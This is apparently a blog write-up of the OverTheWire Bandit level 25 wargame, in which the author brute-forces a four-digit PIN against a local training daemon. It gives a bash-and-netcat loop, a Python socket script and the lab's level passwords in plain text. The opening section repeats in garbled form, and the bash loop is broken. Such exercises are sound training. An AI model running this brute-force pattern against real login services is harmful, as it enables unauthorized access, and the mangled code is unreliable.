Bandit 25
Objectives
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
Solution
a bit frustrated with this one
I spent way to long on this because my connect to the daemon would time out. I was only getting to around try 7000 and of course the correct port was beyond that
First I generate a pass list to throw at netcat
I've started with just 8000 - 9999
#! /bin/bash
Then I throw that at netcat with a grep filter to filter out wrong as a response
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.Correct!The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
now in python
I attacked this one a little different using a socket instead of netcat to pass the values to the daemon. That eliminated my need to create a txt of all possible combos. I instead wrote the response from the daemon to a file that I could grep... knowing the correct port I started the brute force at 8500
import os,socket
Objectives
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
Solution
a bit frustrated with this one
I spent way to long on this because my connect to the daemon would time out. I was only getting to around try 7000 and of course the correct port was beyond that
First I generate a pass list to throw at netcat
I've started with just 8000 - 9999
#! /bin/bash
hash=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
for i in {8000..9999}doecho $hash $i > pass.txt
done
which generates a pass.txt file with lines like this in itUoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9978UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9979UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9980UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9981UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9982UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9983UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 9984
Then I throw that at netcat with a grep filter to filter out wrong as a response
$ cat pass.txt | netcat localhost 30002 | grep -vE 'Wrong'
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.Correct!The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
Exiting.
now in python
I attacked this one a little different using a socket instead of netcat to pass the values to the daemon. That eliminated my need to create a txt of all possible combos. I instead wrote the response from the daemon to a file that I could grep... knowing the correct port I started the brute force at 8500
import os,socket
pass24 = 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ'
counter = 8500
f= open("tries.txt","w+")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = 'localhost'
port = 30002
s.connect((host,port))
for x in range(500):
stringy = str(counter)
all = pass24 + ' ' + stringy + '\n'
s.send(all)
attempt = s.recv(1024).decode() + stringy + ' '
counter = counter + 1
f.write(attempt)
then a quick grep of the tries txt files give us the answer
Comments
Post a Comment